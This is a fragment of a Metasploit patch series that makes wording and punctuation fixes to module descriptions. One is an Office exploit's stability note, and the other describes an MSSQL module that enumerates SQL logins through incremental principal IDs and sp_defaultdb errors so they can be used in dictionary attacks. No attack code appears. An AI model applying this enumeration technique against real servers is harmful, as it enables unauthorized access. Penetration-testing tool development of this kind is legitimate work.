- platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
- setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
+ platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other
+ setups such as using Office 2010 SP1 might be less stable, and may end up with a
 crash due to a failure in the CPackage::CreateTempFileName function.
 },
 'License' => MSF_LICENSE,
From e2dc862121caf539fc831e63cbeab47914172b9f Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 13 Nov 2014 14:53:57 -0600
Subject: [PATCH 38/38] Fix newly introduced typo.
---
 modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
index 5500d48a11..dd90b59eef 100644
--- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
 pretty simple, because the principal IDs assigned to logins are incremental. Once logins
 have been enumerated they can be verified via sp_defaultdb error analysis. This is
 important, because not all of the principal IDs resolve to SQL logins (some resolve to
- roles instead) Once logins have been enumerated, they can be used in dictionary attacks.
+ roles instead). Once logins have been enumerated, they can be used in dictionary attacks.
 },
 'Author' => ['nullbind '],
 'License' => MSF_LICENSE,